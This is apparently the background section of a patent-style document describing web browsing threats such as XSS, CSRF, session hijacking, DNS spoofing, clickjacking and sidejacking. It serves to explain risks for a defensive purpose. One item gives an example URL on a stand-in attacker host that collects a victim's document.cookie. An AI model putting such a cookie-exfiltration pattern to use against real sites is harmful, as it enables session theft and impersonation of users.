Communicating online such as web browsing is fraught with peril. Due to various motivations such as financial, fame, notoriety, maliciousness—various entities are attacking users.
In some ways attackers are considered to have the upper hand due to the fact that the attackers only need to exploit one specific vulnerability whereas security software needs to protect against a myriad combination of attacks. Often attackers exploit the weakest link.
In an online communications environment (such as for example web browsing) users face a variety of issues such as security flaws, holes, or vulnerabilities such as for example:                Cross-site scripting (XSS) or related attacks        Cross-site request forgery (CSRF) or related attacks        Session and/or transaction hijacking related attacks        Javascript used to send a Hypertext Transfer Protocol (HTTP) cookie to an unintended destination or website (e.g. http://maliciousattacker.example.com/cgi-bin/collectCookies?val=document.cookie. This information may then be used for nefarious purposes such as impersonating the user.        Malicious site manipulates a client application (such as for example a web browser) to send data and/or requests to an honest site such as for example a bank        Attack masked to evade detection by encoding information. Multiple encodings may be combined or layered.        Underlying address information (such as for example DNS hijacking, Domain Name System (DNS) spoofing, DNS cache poisoning, arp poisoning, evil twin router) is manipulated to transparently redirect data and/or requests to a destination an attacker can access the data        Cause the release of sensitive data to unintended and/or malicious destination(s)        Cause the release of sensitive data to pass through or within reach of a malicious network(s)        CSRF attacks used to perform unintended operations. CSRF attacks may be delivered to the user through a web page, email, RSS/atom feed, or the like        CSRF attacks can be performed in drive-by fashion and cause client applications (such as web browsers) to perform an operation or request with an honest destination        CSRF attacks a users router. For example, many WiFi router administrator interfaces provide a web interface—an attacker could cause a request or operation to be performed on a router        Manipulation of a users network traffic or online communications such as for example redirects, router hijacking, or the like        Manipulation of data or traffic such as for example surfjacking, sidejacking, or similar attacks        Manipulation of a users mouse movements or unintended following of links (such as for example clickjacking)        Blocking of logout requests (such as for example intercepting specific requests, or stripping out scripts designed to clear or delete cookies, etc. . . . )        Entities are manipulated or tricked to transmit data that was intended only to be transmitted over secure communication channel (such as SSL/TLS) but instead are transmitted over less secure communication channels. For example surfjacking attacks.        Sniffing and replaying HTTP cookies or session-data. For example sidejacking attacks.        Injection of traffic on users network such as for example injection of HTTP packets to manipulate data or traffic        Any other malicious trojan or malware        
Additionally, one or more of the attacks may be combined to further allude any security defenses. It may be difficult for users to recognize or understand these attacks since the underlying technology is somewhat opaque and technical in nature. Additionally, the attacks can be carried out with relatively transparency and the user may not notice anything for some period of time (e.g. when user examines their financial institution statements). Additionally, the attacks may involve non-trivial effort for users to inspect some or all of their traffic.
An attacker may not need access to a users credentials (such as for example username and password) if instead they can control or monitor the web browser.
Users may face difficulty in securing themselves from one or more of the above mentioned attacks, holes, flaws, or vulnerabilities. Even if the users receive training the technical details may still be difficult to overcome.